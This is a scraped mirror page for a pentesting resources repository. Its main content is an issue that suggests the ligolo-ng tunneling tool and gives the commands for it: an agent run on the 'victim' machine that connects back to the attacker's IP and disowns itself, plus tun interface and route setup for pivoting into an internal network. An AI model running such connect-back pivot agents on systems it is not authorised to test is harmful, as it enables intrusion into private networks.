GithubHelp home page GithubHelp logo

theporgs / exegol-resources Goto Github PK

View Code? Open in Web Editor NEW
20.0 20.0 9.0 163.69 MB

Hacking resources for the Exegol project

Home Page: https://exegol.readthedocs.io/

License: GNU General Public License v3.0

Python 72.01% Shell 23.58% ASP.NET 0.12% PowerShell 1.40% YARA 0.07% Batchfile 0.84% PHP 1.98%
active-directory bugbounty hacking pentesting

exegol-resources's People

Contributors

dramelac avatar lap1nou avatar malsius avatar shutdownrepo avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar

exegol-resources's Issues

Easy pivoting with Ligolo-ng

Hi,

How about add the excellent tunneling tool ligolo-ng ?
https://github.com/nicocha30/ligolo-ng

  • It's french,
  • It prevents proxychains use,
  • It uses a tun interface instead of socks

image

Easy to use

  • An agent executable for the victim,
./agent -connect IP:11601 -ignore-cert & disown
  • A proxy executable for the attacker,
ip tuntap add user [your_username] mode tun ligolo
ip link set ligolo up
./proxy -selfcert
  • We list interface on the victime machine through Ligolo-ng
    image

  • We add the route to the 10.1.1.0/24

ip route add 192.168.0.0/24 dev ligolo

And, in ligolo-ng we could start a tunneled session

[Agent : root@sean] » start
[Agent : root@sean] » INFO[0786] Starting tunnel to root@sean

We now have a complete tun access to the 10.1.1.0/24 network from our machine with all our tooling

And last but not least, it's available for a lot of OS/Arch
image

Como se dice en francés : "L'essayer c'est l'adopter" 😁

CI/CD pipeline (resources)

Setup GitHub Actions workflows for updating the resources regularly, at each commit, and test pull requests

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.